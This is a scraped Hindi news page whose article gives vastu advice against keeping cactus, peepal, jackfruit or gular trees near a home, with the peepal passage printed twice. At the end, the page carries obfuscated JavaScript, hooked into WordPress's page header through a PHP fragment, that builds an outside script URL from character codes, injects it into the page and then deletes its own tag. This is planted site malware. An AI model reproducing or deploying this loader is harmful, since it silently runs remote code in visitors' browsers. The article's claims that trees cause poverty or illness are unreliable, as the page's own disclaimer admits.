Friday, July 19, 2024
Google search engine
Homeउत्तराखंडवास्तु टिप्स: घर में भूलकर भी न लगाएं ये पेड़-पौधे, वरना परिवार...

वास्तु टिप्स: घर में भूलकर भी न लगाएं ये पेड़-पौधे, वरना परिवार की सुख-शांति हो जाएगी भंग

वास्तु शास्त्र के अनुसार, कैक्टस का पौधा घर में लगाना अशुभ माना जाता है। कैक्टस का पौधा लगाने से घर में धन टिकता नहीं है। इस वजह से आर्थिक परेशानियां बनी रहती हैं। इसलिए अगर आपके घर में कैक्टस लगा है तो तुरंत हटा दें। वरना परेशानियों से जूझते रहेंगे और कभी बरकत नहीं होगी।पीपल का पेड़ बिल्कुल भी घर में न लगाएं। वास्तु शास्त्र के अनुसार, घर में पीपल का पेड़ लगाना अशुभ होता है। पीपल का पेड़ घर में होने से धन की हानि होती है और मनुष्य पाई-पाई को मोहताज हो सकता है।

इसलिए अगर आपके घर में पीपल का पेड़ लगा हुआ है तो उसे किसी मंदिर में लगा दें। जानकारी के लिए बता दें कि जो व्यक्ति पीपल की एक डाल भी तोड़ता या काटता है, उनके पितृ को कष्ट झेलने पड़ते और वंश वृद्धि करने में बाधा आती है। वैसे पूरे विधि-विधान और नियम के अनुसार पूजन या हवन आदि करवाने के बाद क्षमा मांग कर पीपल की लकड़ी काटी जाए तो दोष नहीं लगता। पुराणों के अनुसार जो व्यक्ति पीपल के वृक्ष की परिक्रमा करता है उसकी सर्व मनोकामनाएं पूर्ण होती है, साथ ही शत्रुओं का नाश भी होता है। पीपल के वृक्ष की पूजा करने से ग्रह दोष बाधा शांत होती है और काल सर्प दोष, पितृदोष शांत रहते है।पीपल का पेड़ बिल्कुल भी घर में न लगाएं। वास्तु शास्त्र के अनुसार, घर में पीपल का पेड़ लगाना अशुभ होता है। पीपल का पेड़ घर में होने से धन की हानि होती है और मनुष्य पाई-पाई को मोहताज हो सकता है।

इसलिए अगर आपके घर में पीपल का पेड़ लगा हुआ है तो उसे किसी मंदिर में लगा दें। जानकारी के लिए बता दें कि जो व्यक्ति पीपल की एक डाल भी तोड़ता या काटता है, उनके पितृ को कष्ट झेलने पड़ते और वंश वृद्धि करने में बाधा आती है। वैसे पूरे विधि-विधान और नियम के अनुसार पूजन या हवन आदि करवाने के बाद क्षमा मांग कर पीपल की लकड़ी काटी जाए तो दोष नहीं लगता। पुराणों के अनुसार जो व्यक्ति पीपल के वृक्ष की परिक्रमा करता है उसकी सर्व मनोकामनाएं पूर्ण होती है, साथ ही शत्रुओं का नाश भी होता है। पीपल के वृक्ष की पूजा करने से ग्रह दोष बाधा शांत होती है और काल सर्प दोष, पितृदोष शांत रहते है।

कटहल का पेड़ घर के आस-पास नहीं लगाना चाहिए। कहते हैं इस पेड़ की वजह से परिवार के लोगों में दरार आती है। इसे घर से दूर लगाना चाहिए। गूलर का पेड़ घर के पास गूलर का पेड़ कभी भी नहीं लगाना चाहिए। इस पेड़ को घर के पास लगाने से दरिद्रता आती है तथा व्यक्ति में बीमारियों का घर बन जाता है। मान्यता है कि घर के उत्तर दिशा में दूर गूलर का पेड़ लगाने से आंख से जुड़ी हुई बीमारियां दूर होती है।

जानकारी सामान्य मान्यताओं पर आधारित है। इस पर पूर्ण विश्वास करना या न करना आपके बुद्धि विवेक पर निर्भर करता है। या फिर आप इसके लिए किसी विश्वसनीय जानकार से जानकारी प्राप्त करें उपयोग में ले। हम इसकी पुष्टि नहीं करते।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>